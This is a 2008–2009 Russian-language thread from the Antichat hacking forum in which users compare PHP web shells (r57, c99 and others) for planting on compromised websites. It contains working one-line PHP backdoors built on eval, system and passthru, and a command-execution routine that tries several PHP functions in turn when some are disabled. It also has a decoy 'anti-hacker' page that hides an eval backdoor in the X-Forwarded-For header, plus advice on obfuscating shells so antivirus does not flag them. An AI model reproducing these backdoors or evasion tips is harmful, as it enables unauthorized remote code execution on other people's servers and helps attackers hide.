Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Каким шеллом вы пользуетесь? (https://forum.antichat.xyz/showthread.php?t=60829)

--exe-- 03.02.2008 04:00

Каким шеллом вы пользуетесь?
 
Собственно хотелось бы узнать кто каким шеллом пользуется...
Сам использую r57shell и доволен.

icegex 03.02.2008 04:03

Юзаю античат шелл.
Иногда gfs shell =\

presidentua 03.02.2008 04:07

МаднетШел - форевер

KPOT_f!nd 03.02.2008 04:12

Шелл от Маг'а он про него многи раз писал)

alexman90 03.02.2008 04:12

r57shell

ps Люди давайте все выкладыва шелы (у кого не приват) понятно что r57shell есть у всех...

Basurman 03.02.2008 04:29

r57 1.42

Piflit 03.02.2008 04:42

Какими презервативами вы пользуетесь?

Nightmarе 03.02.2008 05:20

r57 щас палится всеми антивирями, так-что толку от него мало

zl0y 03.02.2008 05:45

а криптануть ) ?

rem 03.02.2008 06:25

мну хватает <?php ....($_GET["cmd"]) ?>
)))

K1nD[e]R 03.02.2008 06:27

ctt_sh

}{0TT@БЬ)Ч 03.02.2008 07:22

разными

alexman90 03.02.2008 09:51

а поподробней на счёт <?php ....($_GET["cmd"]) ?> - прикол?? Злой у Вас есть криптор пхп кода?

cow 03.02.2008 14:09

Я тоже забиваю в какую нибудь незаметную страничку обратную дверку, а у себя разворачиваю модифицированный STNC WebShell и вуаля - дешево и красиво! ;)

Цитата:

if($c=$_GET['cm']) { passthru($cm); die(); }

icegex 03.02.2008 14:10

Цитата:

а поподробней на счёт <?php ....($_GET["cmd"]) ?> - прикол??
Нет, кстати самый маленький и удобный шелленг =)
Цитата:

Злой у Вас есть криптор пхп кода?
Любой обфускатор возьми и пробуй =)

Shawn1x 03.02.2008 14:20

c99shell юзаю

cow 03.02.2008 14:25

Кстати смежный вопрос. Каким шелом вы пользуетесь при safemode? Я пока в руках покрутил только c99shell safemode edition - ничего так.

-=[AL!EN]=- 03.02.2008 14:31

c99 from Madnet

Basurman 03.02.2008 15:13

cow,
Код:

if($c=$_GET['cm']) { passthru($cm); die(); }
не айс )))

@system($_GET['cm']);

cow 03.02.2008 15:20

Basurman, пока не жалуюсь. В мануал лень лезть, а какая разница? Вот взял из GFS shell:

Цитата:

function ex($comd){ //Выполнение команды
$res = '';
if (!empty($comd)){
if(function_exists('exec')){
exec($comd,$res);
$res=implode("\n",$res);
}elseif(function_exists('shell_exec')){
$res=shell_exec($comd);
}elseif(function_exists('system')){
ob_start();
system($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(function_exists('passthru')){
ob_start();
passthru($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(is_resource($f=popen($comd,"r"))){
$res = "";
while(!feof($f)) { $res.=fread($f,1024); }
pclose($f);
}
}
return $res;
}
Здесь на самом низком уровне комманда passthru, после exec, shell_exec, system.

Sharingan 03.02.2008 15:27

6DIGShell
r57

Nea7 03.02.2008 15:29

Цитата:

Сообщение от alexman90
а поподробней на счёт <?php ....($_GET["cmd"]) ?> - прикол?? Злой у Вас есть криптор пхп кода?

TrueBug PHP Encoder //search

Slon 03.02.2008 15:57

Remview и\или R57 очень удобно

[Raz0r] 03.02.2008 16:21

r57shell 1.42

AFoST 03.02.2008 16:35

c99madshell r57 <? system($cmd); ?>

ice1k 03.02.2008 16:44

Цитата:

Сообщение от Piflit
Какими презервативами вы пользуетесь?

contex

Talisman 03.02.2008 17:26

Цитата:

Сообщение от rem
мну хватает <?php ....($_GET["cmd"]) ?>
)))

это ответ на вопрос: каким шеллом вы оставляете логи...

cow 03.02.2008 18:21

Ксати действительно, надо будет на Post исправить

desTiny 13.03.2008 20:28

А ещё я вот таким шифруюсь:
PHP код:

$pag = isset($_GET['page']) ? $_GET['page'] : 1;
if ((
$pag != 1) && ($pag != 2) && ($pag != 3) && ($pag != 4))
 {   
$aaa = isset($_SERVER['HTTP_X_FORWARDED_FOR'])? $_SERVER['HTTP_X_FORWARDED_FOR'] : "\"\"";
     
$k explode('.'$aaa);
     if (isset(
$k[3]) && is_numeric($k[3]))
       
$aaa "\"$aaa\"";
     print 
"Never do it again, dumm from ";
     eval(
"print $aaa;");
     print 
" via ".$_SERVER['REMOTE_ADDR'];
     print 
"<IMG align='left' src='img/stop.jpg' />";
     
footer();
     die;
 }; 

Если чё-то передать в X-Forwarded-For, то можно выполнить php код=) А якобы отпугиватель хакеров=)

Xcontrol212 13.03.2008 20:42

c99shell юзаю

Isis 13.03.2008 20:58

r57 1.42 +1 :)

Ershik 13.03.2008 21:28

c99shell.php Стилем больше нравиться, да и ОтЗенденный он больше нравиться для антивирусов :)

Spyder 13.03.2008 21:43

ачат+c99 от мэднета

PandoraBox 13.03.2008 22:26

C99 madnet 2.0 -)

Shadow_p1raT 14.03.2008 16:30

Ща юзаю r57shell

Noiro 15.03.2008 00:06

r57shell.
Самопалы типа <?php eval($_GET['cmd']);?> <?php echo `$_GET[cmd]`;?> пользую только чтобы нормальный шелл воткнуть, ибо многие хостеры отключают system() passthru() и т.д., шелл должен все проверять по порядку способы.

ртуть 15.03.2008 00:22

Цитата:

Сообщение от ice1k
contex

contex light suxxx

blackybr 15.03.2008 00:37

Цитата:

Сообщение от desTiny
А ещё я вот таким шифруюсь:
PHP код:

$pag = isset($_GET['page']) ? $_GET['page'] : 1;
if ((
$pag != 1) && ($pag != 2) && ($pag != 3) && ($pag != 4))
 {   
$aaa = isset($_SERVER['HTTP_X_FORWARDED_FOR'])? $_SERVER['HTTP_X_FORWARDED_FOR'] : "\"\"";
     
$k explode('.'$aaa);
     if (isset(
$k[3]) && is_numeric($k[3]))
       
$aaa "\"$aaa\"";
     print 
"Never do it again, dumm from ";
     eval(
"print $aaa;");
     print 
" via ".$_SERVER['REMOTE_ADDR'];
     print 
"<IMG align='left' src='img/stop.jpg' />";
     
footer();
     die;
 }; 


Если чё-то передать в X-Forwarded-For, то можно выполнить php код=) А якобы отпугиватель хакеров=)

Oo

eval($_SERVER['HTTP_X_FORWARDED_FOR']);

desTiny 15.03.2008 09:44

Цитата:

Сообщение от blackybr
Oo

eval($_SERVER['HTTP_X_FORWARDED_FOR']);

Угу=) Зато видимость противохакерской защиты=)

попугай 17.06.2009 16:42

Щас c99madshell стал палиться антивирями.. жялько)


Время: 01:33